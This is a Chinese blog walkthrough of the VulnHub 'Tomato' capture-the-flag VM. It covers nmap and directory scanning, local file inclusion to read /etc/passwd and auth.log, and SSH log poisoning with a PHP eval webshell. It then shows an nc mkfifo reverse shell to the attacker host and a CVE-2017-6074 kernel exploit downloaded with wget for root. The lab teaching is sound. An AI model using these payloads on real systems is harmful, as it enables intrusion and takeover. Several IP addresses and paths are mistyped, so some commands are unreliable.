靶场通关 | Tomato靶机通关秘籍~

最新推荐文章于 2024-05-12 12:36:27 发布
最新推荐文章于 2024-05-12 12:36:27 发布
阅读量1k 收藏 11
点赞数 1
分类专栏: 靶机合集 文章标签: sqlserver android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_50750081/article/details/133775357
版权

一、靶机部署

下载地址:

Tomato: 1 ~ VulnHub

打开VMware,在文件中选择打开:

输入靶机名称并选择存放地址:

等待导入:

编辑虚拟机设置:

配置自己给,网络模式我这里选择NAT,只要和kali在同一网段下即可:

注意:这里要配置好,不要多次更改,会导致后面实验崩溃。

开启虚拟机:

导入成功!!!

二、信息收集

1.探测靶机IP

扫描、发现主机

nmap -sA 192.168.168.0/24

对比MAC得到:靶机地址:192.168.168.131

2. 端口扫描

使用nmap对靶机进行详细的扫描:

nmap -A -T4 -p- 192.168.168.131 -A:使用所有高级扫描选项

-T4:设置时许,越高扫描越快

-p-:全端口扫描

3. 敏感目录扫描

dirb http://192.168.168.131

注:-w提示目录可以列出

再次扫描目录:

gobuster dir -u http://192.168.168.131 -w /usr/share/dirb/wordlists/common.txt -t 30

再次详细扫描目录:

dirb http://192.168.168.131 /usr/share/dirb/wordlists/common.txt

4. 信息收集总结

IP:192.168.168.131
开放端口:21、80、2211、8888
敏感目录:http://192.168.168.131/antibot_image/

三、渗透过程

1. 漏洞发现

登录网站:

http://192.168.168.131

发现一个大大的、红红的西红柿,买个西红柿,继续进行漏洞探测!!!
访问敏感目录:

http://192.168.168.131/antibot_image/

发现一堆东西,但不知道干嘛的!!!
经过一番搜寻,在

http://192.168.11.146/antibot_image/antibots/info.php

页面,查看源代码发现东西。

允许远程读取URL文件,但是不允许包含URL文件,可以进行利用。

查源码,提示可以传参,存在文件包含漏洞。

2. 文件包含漏洞利用

通过分析,该页面的源码中存在include,文件包含漏洞,我们尝试用该漏洞查看passwd文件,发现可以成功

http://192.168.168.131/antibot_image/antibots/info.php?image=../../../../../../../etc/passwd

既然可以查看密码文件,那我们尝试查看一下其他文件。
查看日志文件,日志文件记录了其他用户的一些操作,其中或许留有线索。

http://192.168.168.131/antibot_image/antibots/info.php?image=../../../../../../var/log/auth.log

发现该文件还记录了ssh登录的登录日志,无论登录成功与否都有记录,那么我们是否也可以使用这个机制写入一句一句话木马。

3. 反弹shell

将一句话木马作为ssh登录的用户名,然后登陆,密码随便输入,这样日志文件就会记录该用户登录失败的日志,而该用户的用户名就是我们的一句话木马。

ssh '<?php phpinfo();eval($_POST['sss']);?>'@192.168.168.131 -p 2211

写入之后我们使用蚁剑进行连接:

URL地址:http://192.168.192.168.168.131/antibot_image/antibots/info.php?image=../../../../../../../var/log/auth.log

密码:sss

连接成功后打开终端:

4. 生成可交互式shell

python3 -c"import pty;pty.spawn( '/bin/bash')"

反弹shell

192.168.168.128是kali的

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.168.128 9999 >/tmp/f

四、提权

1.查看系统信息

uname -a

whoami

2.使用CVE-2017-6074进行提权

下载提权脚本,执行,编译,并开启apache2服务

使用CVE-2017-6074的poc

git clone https://github.com/kkamagui/linux-kernel-exploits.git

cd linux-kernel-exploits/kernel-4.4.0-21-generic/CVE-2017-6074

./compile.sh

3.执行exp

使靶机访问攻击机的网站,下载exp,授予权限,并执行

cd /tmp

wget http://192.168.232.129/CVE-2017-6074

chmod +x CVE-217-6074/CVE-2017-6074

4.查看flag

cd /root

ls

cat proof.txt

 成功!!!

参考文档:

VulnHub-Tomato靶机详细渗透过程_小秋LY的博客-CSDN博客

VulnHub-Tomato_51CTO博客_tomato tomato

(谢谢大家!欢迎提出批评和建议!你的支持是我持续更新的巨大动力!)

溯溯学网安
关注
  • 1
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
【愚公系列】2023年06月 网络安全高级班 101.CTF黑客比赛(Tomato靶机
时光隧道
06-05 4311
Tomato靶机是一个用于渗透测试和漏洞研究的虚拟机。它是由Tomato Security公司开发的,基于Debian操作系统,并包含了多个常见的漏洞和安全工具,如Metasploit、Nmap、Burp Suite等。它模拟了一个真实的网络环境,用户可以在其中执行实际的攻击和渗透测试,以测试其安全性和发现潜在的漏洞。Tomatosecurity官网提供了Tomato靶机的下载和使用说明。
Vulnhub篇Tomato.zip
01-12
主要包括两部分,一部分是tomato的学习笔记过程,另一部分是,过程中使用到文件,供大家学习参考。
【打靶记录】VulnHub-Tomato靶机渗透wp
qq_39972370的博客
11-17 1567
Tomato靶机是一个用于渗透测试和漏洞研究的虚拟机。它是由Tomato Security公司开发的,基于Debian操作系统,并包含了多个常见的漏洞和安全工具,如Metasploit、Nmap、Burp Suite等。它模拟了一个真实的网络环境,用户可以在其中执行实际的攻击和渗透测试,以测试其安全性和发现潜在的漏洞。
2024年最新靶机实战系列之Tomato靶机,2024年最新神级Golang进阶笔记
最新发布
2401_84919661的博客
05-12 258
技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。攻击和防守要学的东西也不少,具体要学的东西我都写在了上面的路线图,如果你能学完它们,你去就业和接私活完全没有问题。(都打包成一块的了,不能一一展开,总共300多集)同样的在日志文件中确实发现了存在相关记录。1.6 反弹shell。
VulnHub靶场渗透实战-Tomato
随心所欲不逾矩
09-01 1855
特莫特来啦!靶机环境:Vmware网络:NAT模式靶场难度:中一难结果:利用文件包含漏洞提权。
vulnhub靶场Tomato
kukudeshuo的博客
07-25 653
vulnhub靶场Tomato 环境准备 靶机下载地址:https://www.vulnhub.com/entry/tomato-1,557/ 攻击机:kali(192.168.109.128) 靶机Tomato:(192.168.109.141) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标哦靶机IP为192.168.109.141 使用nmap扫描查看目标端口开放情况 开
vulnhub靶场-tomato
qq_42947816的博客
03-07 7519
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
vulnhub靶场-tomato渗透测试
m0_62750315的博客
09-08 1519
小白学渗透
Python库 | tomato-timer-1.0.3.tar.gz
03-11
《Python库Tomato Timer 1.0.3详解》 在编程领域,Python因其简洁的语法和丰富的库支持,已经成为开发者们青睐的编程语言之一。本文将深入探讨一个名为"Tomato Timer"的Python库,具体版本为1.0.3,通过分析其源...
tomato打印服务共享教程
06-01
tomato打印服务共享教程 本教程旨在指导用户如何配置tomato打印服务共享,实现打印机的网络共享。整个过程可以分为五个步骤:配置服务器、启动打印服务功能;有线接入主路由配置;无线连接主路由配置;电脑添加网络...
tomato固件修改工具
06-01
"Tomato固件修改工具"是一款专为网络路由器固件定制和优化的工具,尤其适用于那些使用Tomato固件的设备。Tomato是一款轻量级的开源固件,基于Linux,提供了一系列高级功能,如DDNS(动态域名解析服务)、QoS(服务...
Tomato RAF+ 固件合集
07-06
Tomato RAF+ 可以让普通路由器摇身一变,成为拥有不逊色于商用路由器的功能的路由器, Tomato RAF+ 绝对是你遇到的国内功能最强的Tomato 固件,它是一款适合家用和商用的免费第三方路由器系统。 刷了 Tomato RAF+ 的...
【每日打靶练习】Vulnhub靶机平台-tomato
leo788的博客
12-30 1455
在网页的下边找到包含内容,通过返回信息中的用户属性得到信息:root用户可以执行shell,下方的tomato用户也可以执行shell,继续。尝试ssh连接,这里使用错误的用户名和错误的密码,输入三次后,写入日志中,检查一下log,成功获取到日志信息,可通过修改ruser来进行注入。刷新日志进行查看,发现注入未显示,证明注入成功,木马被作为代码执行,若显示则失败,代码木马作为文本执行。包含失败,这里未开放远程包含,同时本地包含文件无可再利用—》转换思路。执行后的匹配到相应漏洞,选择可能性高的来试一下。
靶机实战系列之Tomato靶机
Javachichi的博客
02-07 1051
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。(都打包成一块的了,不能一一展开,总共300多集)
VulnHub渗透测试实战靶场 - Tomato:1
LYJ20010728的博客
08-19 1821
VulnHub渗透测试实战靶场 - Tomato:1环境下载Tomato:1靶机搭建渗透测试信息搜集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 Tomato:1靶机搭建 将下载好的靶机导入Vmware,网络连接设置为NAT模式即可 渗透测试 信息搜集 用arp-scan探测一下网段内目标靶机的IP:sudo arp-scan -l 得到目标靶机的IP为:192.168.246.137 使用 nmap 扫描开放的端口:sudo nmap -sC -sV -p 1-100
Vulnhub靶机TOMATO_ 1
LainWith的博客
08-29 1073
系列Tomato(此系列共1台)发布日期:2020年09月14日注释:使用vmwar workstation运行虚拟机难度:低目标:取得 root 权限 + Flag主机发现端口扫描信息收集路径爬取文件包含写入日志内核漏洞枚举本地提权。...
tomato靶机打靶过程及思路
qq_52610024的博客
05-30 423
5.反弹shell成功,开始进行提权,查看到内核版本为16.04可以进行内核版本提权,提权成功拿下root权限,打靶完成。3.发现info.php提示文件包含,读取到/var/log/auth.log,可以用ssh登录传入一句话木马,2.ftp端口没有可利用的方法,路径爆破80端口,发现路径目录antibot_image下有路径。用蚁剑连接,还查看/home/tomato/.ssh/id_rsa没有发现公私钥信息。-i&32>&3);1.常规端口及服务发现。...
Tomato靶机渗透
qq_44732584的博客
03-23 424
渗透测试
Vulnhub-Tomato靶机实战
御七彩虹猫
05-06 967
Vulnhub-Tomato靶机实战
c++的插件tomato如何添加到vs里面
12-26
要将 c 的插件tomato添加到 VS 中,首先需要打开 Visual Studio。然后点击顶部的菜单栏中的“扩展”选项,并选择“扩展管理器”。在扩展管理器中,选择“在线”选项卡,并在搜索框中输入“tomato”来查找 c 的插件。...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值